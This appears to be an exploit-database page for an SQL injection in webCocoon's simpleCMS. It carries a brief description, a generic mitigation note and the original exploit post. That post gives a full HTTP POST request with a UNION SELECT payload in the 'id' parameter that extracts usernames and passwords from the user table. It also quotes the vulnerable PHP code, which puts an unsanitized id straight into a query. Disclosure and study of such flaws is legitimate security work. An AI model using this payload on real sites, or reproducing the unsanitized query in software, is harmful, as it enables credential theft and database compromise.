header-logo
Suggest Exploit
vendor:
simpleCMS
by:
ÝNFAZCI
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: simpleCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

webCocoon’s simpleCMS Vulnerability

An SQL injection vulnerability exists in the webCocoon's simpleCMS plugin, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'show.php' file. The vulnerable code is located in the 'show.php' file, where the 'id' parameter is not properly sanitized before being used in an SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the 'index.php' file, which contains malicious SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

#############################################################
# webCocoon's simpleCMS Vulnerability

# Plugin Home: http://webcocoon.wordpress.com

# Author:_ÝNFAZCI_

# Site: www.1923turk.biz
  
##############################################################

# Exploit: 
            

Vuln file: /content/post/show.php


Exploit:


POST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

id=xek' union select null,concat_ws(0x3a,username,password),null,null,n  ull,null,null,null,null,null,null,null,null,null,n  ull,null from user -- &mode=post&gfile=show
 



//Show post 
$get_post = mysql_query("SELECT*FROM post WHERE post_id = '$id' AND status = 'published'"); 
$post_result = mysql_num_rows($get_post); 
$post = mysql_fetch_array($get_post);